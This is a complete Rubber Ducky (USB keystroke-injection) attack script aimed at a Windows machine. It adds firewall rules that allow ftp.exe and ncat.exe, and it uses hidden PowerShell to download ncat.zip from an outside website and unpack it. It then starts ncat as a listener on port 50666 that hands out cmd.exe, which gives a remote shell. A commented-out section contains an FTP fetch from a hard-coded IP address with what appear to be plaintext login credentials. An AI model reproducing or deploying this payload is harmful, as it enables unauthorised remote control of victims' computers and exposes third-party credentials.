RubberDucky
DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
REM STRING netsh firewall set opmode disable
REM ENTER
REM DELAY 2000
STRING netsh advfirewall firewall add rule name="01.rd.ftp.in" dir=in action=allow program="C:\Windows\System32\ftp.exe" enable=yes
ENTER
DELAY 500
STRING netsh advfirewall firewall add rule name="02.rd.ftp.out" dir=out action=allow program="C:\Windows\System32\ftp.exe" enable=yes
ENTER
DELAY 500
STRING netsh advfirewall firewall add rule name="01.rd.nc.in" dir=in action=allow program="%USERPROFILE%\ncat.exe" enable=yes
ENTER
DELAY 500
STRING netsh advfirewall firewall add rule name="02.rd.nc.out" dir=out action=allow program="%USERPROFILE%\ncat.exe" enable=yes
ENTER
DELAY 500
REM STRING echo open 194.55.13.160 21 > ftp.txt
REM ENTER
REM DELAY 100
REM STRING echo heckhausenftp3>> ftp.txt
REM ENTER
REM DELAY 100
REM STRING echo r00tAccess-FuN>> ftp.txt
REM ENTER
REM DELAY 100
REM STRING echo bin >> ftp.txt
REM ENTER
REM DELAY 100
REM STRING echo get ncat.zip >> ftp.txt
REM ENTER
REM DELAY 100
REM STRING echo bye >> ftp.txt
REM ENTER
REM DELAY 100
REM STRING ftp -s:ftp.txt
REM ENTER
REM STRING del ftp.txt & exit
REM ENTER
REM DELAY 3000
GUI r
DELAY 200
STRING powershell -windowstyle hidden iex (wget https://www.heckhausen.it/honeypott/ncat.zip -OutFile $env:userprofile\ncat.zip)
ENTER
DELAY 5000
GUI r
DELAY 200
STRING powershell -windowstyle hidden iex (Expand-Archive .\$env:userprofile\ncat.zip -DestinationPath $env:userprofile)
ENTER
DELAY 5000
GUI r
DELAY 200
STRING cmd /c "start /MIN cmd /C ncat.exe 50666 -e cmd.exe -l"
ENTER